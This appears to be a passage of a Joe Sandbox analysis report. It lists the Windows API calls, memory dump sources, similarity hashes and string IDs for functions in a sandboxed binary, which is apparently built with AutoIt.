                                                  • Instruction ID: 9e9bed75e78447ac3b9be03acf1349ec6e4f416e51e93160cd529ebbaeab4979
                                                  • Opcode Fuzzy Hash: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
                                                  • Instruction Fuzzy Hash: C6113A79905218BFDB10DB95CC84FDDBB74FB49710F204095E900B7250DA716E51EB94
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8
                                                  • GetClientRect.USER32(?,?), ref: 00BFB5FB
                                                  • GetCursorPos.USER32(?), ref: 00BFB605
                                                  • ScreenToClient.USER32(?,?), ref: 00BFB610
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: fd800e6050488a9f0233f9d90c51082680325d0ec9a4df604662c2650aa8d090
                                                  • Instruction ID: 5fcd40faa32d5370690c4f70513ed9ab6cdbe692e0f0d318c0dc54a67748b4c6
                                                  • Opcode Fuzzy Hash: fd800e6050488a9f0233f9d90c51082680325d0ec9a4df604662c2650aa8d090
                                                  • Instruction Fuzzy Hash: E9112839900019ABDB00EF98D885EEEB7F8FB06301F40089AF941EB141C730AA528BA5
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C2115F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C21184
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C2118E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C211C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 0327682151b509705b605036a43b5fb02b779608a0ca4ff58931cda064750330
                                                  • Instruction ID: f2b88667a10b8d22d0c04e7267824e1a5e22464e405b0e15d3a2f2b61af9b675
                                                  • Opcode Fuzzy Hash: 0327682151b509705b605036a43b5fb02b779608a0ca4ff58931cda064750330
                                                  • Instruction Fuzzy Hash: 8F112E35D0062DD7CF009FA5E8487EEBBB8FF29711F054059EE55B2240CB7055A1CB96
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C1D84D
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C1D864
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C1D879
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C1D897
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: e0524e1b7e29e4982340ba0c0a12f5ce09c5a539aaf4f8431e377f5735121da1
                                                  • Instruction ID: e1ad4bcdf0a8e64b3f03233dce3b21ec4bcc2a587a98bc544313344037a89098
                                                  • Opcode Fuzzy Hash: e0524e1b7e29e4982340ba0c0a12f5ce09c5a539aaf4f8431e377f5735121da1
                                                  • Instruction Fuzzy Hash: 4F113C75605304DBF3208F51EC08FD6BBB8EB01B10F10856DA916D6190D7B0E689ABE1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 28862888ed27b593d59d43dfd5d9fc1e2d15d52d7103e34756810cbecf51846c
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 7301723208414EBBCF125E98DC41CED3FA2FF18350B588495FF185A030CA36C9B9AB81
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C4B2E4
                                                  • ScreenToClient.USER32(?,?), ref: 00C4B2FC
                                                  • ScreenToClient.USER32(?,?), ref: 00C4B320
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B33B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
                                                  • Instruction ID: 0c855c3af73848ae2484fdf5b3ec605243a116126f2d7e368eb2079975458ffc
                                                  • Opcode Fuzzy Hash: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
                                                  • Instruction Fuzzy Hash: 6C114679D00209EFDB41CF99D444AEEFBF5FB09310F104166E914E3220D735AA658F50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4B644
                                                  • _memset.LIBCMT ref: 00C4B653
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C86F20,00C86F64), ref: 00C4B682
                                                  • CloseHandle.KERNEL32 ref: 00C4B694
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: f4adda3d896a2acd72dfa46a0f67c60f72fd689f13e3142f688f4b2a6e7a6ffc
                                                  • Instruction ID: 86b206be63d898e7b0de272d86d536c366345dad90693a28ee6941f528fbfdcd
                                                  • Opcode Fuzzy Hash: f4adda3d896a2acd72dfa46a0f67c60f72fd689f13e3142f688f4b2a6e7a6ffc
                                                  • Instruction Fuzzy Hash: 8BF0FEF2540304BAE6106BA5BC06FBF7A9CEB09795F004035BB08E51A2D775DC1187AC
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C26BE6
                                                    • Part of subcall function 00C276C4: _memset.LIBCMT ref: 00C276F9
                                                  • _memmove.LIBCMT ref: 00C26C09
                                                  • _memset.LIBCMT ref: 00C26C16
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C26C26
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: 695e2d14cc0c63a1a059d30495dc7d404570a002e4c7b6359d4fcd7f2504bb4a
                                                  • Instruction ID: 21f0e5a7ba406ee6dbfffe647eded0540b2f049997de721ab06a1d1fbf7a13eb
                                                  • Opcode Fuzzy Hash: 695e2d14cc0c63a1a059d30495dc7d404570a002e4c7b6359d4fcd7f2504bb4a
                                                  • Instruction Fuzzy Hash: 7DF05E3A200210ABCF016F95EC85B8ABB69EF46320F04C0A5FE085E227C771E811DBB4
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BC2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BC223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BC2258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00BFBE83
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BFBE90
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00BFBEA9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00BFBEC2
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFBEE2
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFBEED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: fb74b855005aa7dd9ff98895edd9be62a1d4033b5342159f9d9fd52722cd114d
                                                  • Instruction ID: f6d1ca58c0cdd06d316a649303bf96377a94fb88e10e369809442c74f344c9ee
                                                  • Opcode Fuzzy Hash: fb74b855005aa7dd9ff98895edd9be62a1d4033b5342159f9d9fd52722cd114d
                                                  • Instruction Fuzzy Hash: 71E03036104144EADF215F64EC0DBDC3B50EB06332F0083AAFA69580E187B14585DB11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C1871B
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C182E6), ref: 00C18722
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C182E6), ref: 00C1872F
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C182E6), ref: 00C18736
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
                                                  • Instruction ID: f5acdd788076eee3a8903cac6b2355ae25fc7bda7d964d758f39ddd94c185a24
                                                  • Opcode Fuzzy Hash: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
                                                  • Instruction Fuzzy Hash: 90E0863A6152119BD7205FB05D0CB9F3BACFF52791F14482CB245C9090DA748486D750
                                                  APIs
                                                  • __getptd_noexit.LIBCMT ref: 00BE5DAD
                                                    • Part of subcall function 00BE99C4: GetLastError.KERNEL32(00000000,00BE0DD3,00BE8B2D,00BE57A3,?,?,00BE0DD3,?), ref: 00BE99C6
                                                    • Part of subcall function 00BE99C4: __calloc_crt.LIBCMT ref: 00BE99E7
                                                    • Part of subcall function 00BE99C4: __initptd.LIBCMT ref: 00BE9A09
                                                    • Part of subcall function 00BE99C4: GetCurrentThreadId.KERNEL32 ref: 00BE9A10
                                                    • Part of subcall function 00BE99C4: SetLastError.KERNEL32(00000000,00BE0DD3,?), ref: 00BE9A28
                                                  • CloseHandle.KERNEL32(?,?,00BE5D8C), ref: 00BE5DC1
                                                  • __freeptd.LIBCMT ref: 00BE5DC8
                                                  • ExitThread.KERNEL32 ref: 00BE5DD0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                  • String ID:
                                                  • API String ID: 4169687693-0
                                                  • Opcode ID: bf40ba9cd83c57f423824d72d0b9e9ba66843ae2913bee2ee4acece97f7fa14a
                                                  • Instruction ID: 353943c0ee3f1ff157f6d3fda0083bd7aaa300ac9e80b3172341d128c9ea7a80
                                                  • Opcode Fuzzy Hash: bf40ba9cd83c57f423824d72d0b9e9ba66843ae2913bee2ee4acece97f7fa14a
                                                  • Instruction Fuzzy Hash: 35D0A735401F5047C2322B718C0DB2D33D0EF01B35B04C36CF065451F18B2458038641
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C1B4BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: c1346cf3f932cc09be0ad7f9a6aa6b8639a9aa6f826f52d918a7c4651deb1178
                                                  • Instruction ID: e956249d4677a0ffe2878a845f42892d31282269d93d7601b3398abfe8a7bc98
                                                  • Opcode Fuzzy Hash: c1346cf3f932cc09be0ad7f9a6aa6b8639a9aa6f826f52d918a7c4651deb1178
                                                  • Instruction Fuzzy Hash: FE913870600601AFDB14DF65C884AAAB7E5FF4A710F20856DF95ACB2A1DB70ED81DF50
                                                  APIs
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • __wcsnicmp.LIBCMT ref: 00C2B02D
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C2B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 1692e25620f4a8230c0373539b1a057d9a0d01987919cd3d654d1706f11c7608
                                                  • Instruction ID: 68b03b8fc4898591e62eb50e77e213ae5178c41ec5ceaf4ad4f49ab0730641ff
                                                  • Opcode Fuzzy Hash: 1692e25620f4a8230c0373539b1a057d9a0d01987919cd3d654d1706f11c7608
                                                  • Instruction Fuzzy Hash: 95618075A00225AFDB14DF94D895EAEB7F4FF08710F1040A9F926AB791DB70AE80CB50
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00BD2968
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BD2981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: b297e3b9b1cd51df79bf767dcf61567b7211b9425a843caf6e59f24d2c9fbffd
                                                  • Instruction ID: 49dcbca3c2899b157f02518479fbd33e1f977244c99a836e789c9a86c3be208c
                                                  • Opcode Fuzzy Hash: b297e3b9b1cd51df79bf767dcf61567b7211b9425a843caf6e59f24d2c9fbffd
                                                  • Instruction Fuzzy Hash: DB5128714187449BE320EF10D886BAFBBE8FF85354F41889DF2D8421A1DB718569CB66
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3259E
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C325D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 8aad4972398853298fa07f976945f02836204a6968c0088bacf14153d5e6ddb0
                                                  • Instruction ID: fa02b0020d4175d4d2f5f559ac89064cc55b130967d15653611041b6f6d93fa3
                                                  • Opcode Fuzzy Hash: 8aad4972398853298fa07f976945f02836204a6968c0088bacf14153d5e6ddb0
                                                  • Instruction Fuzzy Hash: 67310A71810119ABCF11EFA1CC86EEEBFB8FF08310F10009AF915A6162DB315A56DF60
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C47B61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C47B76
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: f607817e60ade490d9a18381a4c2216aa45bcad64e864f4a04419b246d7c2620
                                                  • Instruction ID: ba33925c2f20f8e926d5ff42c37217964dd647bcfcf1689e1f2ec3a81c4efc09
                                                  • Opcode Fuzzy Hash: f607817e60ade490d9a18381a4c2216aa45bcad64e864f4a04419b246d7c2620
                                                  • Instruction Fuzzy Hash: 8C41F874A0520A9FDB14CF65C981BEEBBB9FF09300F10526AE914EB391D770AA51DF90
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00C46B17
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C46B53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: a18506cf4dd6e68311fefd118f043dd7faa112e5a6d9feb7dc5055f92fbafb01
                                                  • Instruction ID: 17bf1bfa144fecdb1b7c2cca15b83d1162a6c96775a0532d7e5cd912835566d9
                                                  • Opcode Fuzzy Hash: a18506cf4dd6e68311fefd118f043dd7faa112e5a6d9feb7dc5055f92fbafb01
                                                  • Instruction Fuzzy Hash: 10318A71200604AEEB109F68CC80BFB73A9FF49764F10862DF9A9D7190DA31AC91DB61
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22911
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C2294C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 4ce608f03cce20ea73c077d910092ea5f3d0221d40017f6daa675c9c9acb0cfc
                                                  • Instruction ID: 541767c35863359d49c6d221b6367f2106b07e4f7f89b69acd59fe7e7fa45bea
                                                  • Opcode Fuzzy Hash: 4ce608f03cce20ea73c077d910092ea5f3d0221d40017f6daa675c9c9acb0cfc
